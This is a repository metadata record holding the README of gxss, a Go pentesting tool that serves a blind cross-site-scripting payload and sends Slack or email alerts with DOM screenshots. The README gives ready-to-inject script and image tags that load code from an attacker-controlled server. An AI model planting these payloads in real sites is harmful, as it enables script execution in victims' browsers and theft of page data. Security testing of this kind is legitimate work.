{"id":13762808,"url":"https://github.com/rverton/gxss","last_synced_at":"2026-03-09T16:15:45.769Z","repository":{"id":57543016,"uuid":"200214311","full_name":"rverton/gxss","owner":"rverton","description":"Blind XSS service alerting over slack or email","archived":false,"fork":false,"pushed_at":"2019-08-06T08:36:48.000Z","size":242,"stargazers_count":29,"open_issues_count":0,"forks_count":7,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-12-17T15:36:26.221Z","etag":null,"topics":["blind-xss","exfiltration","pentesting","security","xss"],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rverton.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-08-02T10:17:36.000Z","updated_at":"2025-12-14T19:55:30.000Z","dependencies_parsed_at":"2022-09-26T18:31:26.619Z","dependency_job_id":null,"html_url":"https://github.com/rverton/gxss","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/rverton/gxss","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rverton","download_url":"https://codeload.github.com/rverton/gxss/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/r
epositories/rverton%2Fgxss/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30301941,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-09T14:33:48.460Z","status":"ssl_error","status_checked_at":"2026-03-09T14:33:48.027Z","response_time":61,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blind-xss","exfiltration","pentesting","security","xss"],"created_at":"2024-08-03T14:00:57.845Z","updated_at":"2026-03-09T16:15:45.739Z","avatar_url":"https://github.com/rverton.png","language":"Go","funding_links":[],"categories":["Weapons"],"sub_categories":["Tools"],"readme":"## Blind XSS as a service\n\n**gxss** is a simple tool that serves a JavaScript payload and lets you identify blind XSS vulnerabilities. This is similar to [xsshunter](https://github.com/mandatoryprogrammer/xsshunter), but a bit simpler to configure and run. Alerts can be sent via Slack or email. 
Emails will also have a screenshot of the DOM attached (which is not possible over the Slack webhook API).\n\n![gxss](misc/mail.png)\n\n*Note: The JavaScript payload was taken (and slightly modified) from [xsshunter](https://github.com/mandatoryprogrammer/xsshunter)*\n\n### Installation\n\n```\ngo get -u github.com/rverton/gxss\n```\n\n### Configuration\n\nCreate a file called `.env` or set up your environment to export the following data:\n```\nPORT=8080\nMAIL_SERVER=mail.example.com:25\nMAIL_USER=user\nMAIL_PASS=pass\nMAIL_TO=hello@robinverton.de\nMAIL_FROM=gxss@robinverton.de\nSLACK_WEBHOOK=https://hooks.slack.com/XYZ\nSERVE_URL=localhost:8080\n```\n\nThe `SERVE_URL` is the publicly accessible URL of your server.\n\nYou can leave the `MAIL_*` or the `SLACK_WEBHOOK` setting blank if you do not want to use it. Find out more about how to set up Slack webhooks [here](https://api.slack.com/incoming-webhooks).\n\n### Usage\n\n```\n$ gxss\n```\n\nYou can now use a payload like the following, which will load and execute the JavaScript payload:\n\n```html\n\u003cscript src=//yourserver.com\u003e\u003c/script\u003e\n```\n\ngxss can also be used as a request bin. Every request matching `//yourserver.com/k{key}` triggers an alert. Example:\n\n```html\n\u003cimg src=//yourserver.com/kTARGET1\u003e\n```\n\n### Alternatives\n\n* [xsshunter](https://github.com/mandatoryprogrammer/xsshunter), Python, most features, alerts require Mailgun account and wildcard certificate\n* [xless](https://github.com/mazen160/xless), Node.js, serverless on [zeit.co](https://zeit.co), alerts over Slack\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frverton%2Fgxss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frverton%2Fgxss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frverton%2Fgxss/lists"}